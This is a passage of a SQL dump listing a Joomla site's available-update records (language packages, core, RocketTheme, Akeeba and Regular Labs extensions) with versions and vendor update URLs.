US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12899,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12900,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12901,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12902,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12903,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12904,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12905,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12906,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12907,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12908,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12909,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12910,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12911,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12912,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12913,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12914,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12915,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12916,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12917,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12918,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12919,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12920,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12921,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12922,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12923,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12924,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12925,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12926,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12927,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12928,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12929,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12930,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12931,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12932,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12933,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12934,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12935,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12936,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12937,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12938,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12939,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12940,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12941,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12942,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12943,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12944,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12945,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12946,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12947,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12948,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12949,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12950,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12951,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12952,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12953,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12954,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12955,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12956,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12957,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12958,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12959,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12960,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12961,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12962,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12963,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12964,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12965,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12966,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12967,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12968,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12969,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12970,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12971,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12972,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12973,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12974,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12975,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12976,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12977,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12978,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12979,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12980,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12981,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12982,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12983,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12984,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12985,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12986,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12987,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12988,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12989,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12990,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12991,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12992,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12993,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12994,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12995,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12996,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12997,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12998,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12999,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13000,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13001,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13002,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13003,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13004,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13005,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13006,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13007,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13008,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13009,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13010,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13011,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13012,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13013,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13014,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13015,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13016,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13017,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13018,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13019,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13020,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13021,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13022,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13023,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13024,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13025,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13026,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13027,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13028,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13029,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13030,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13031,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13032,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13033,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13034,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13035,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13036,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13037,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13038,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13039,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13040,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13041,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13042,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13043,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13044,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13045,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13046,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13047,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13048,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13049,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13050,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13051,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13052,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13053,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13054,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13055,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13056,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13057,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13058,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13059,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13060,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13061,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13062,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13063,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13064,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13065,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13066,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13067,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13068,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13069,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13070,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13071,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13072,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13073,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13074,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13075,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13076,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13077,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13078,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13079,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13080,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13081,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13082,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13083,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13084,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13085,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13086,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13087,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13088,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13089,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13090,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13091,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13092,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13093,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13094,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13095,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(13096,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(13097,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13098,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(13099,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13100,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13101,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(13102,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13103,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13104,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13105,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13106,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13107,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13108,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13109,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13110,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','','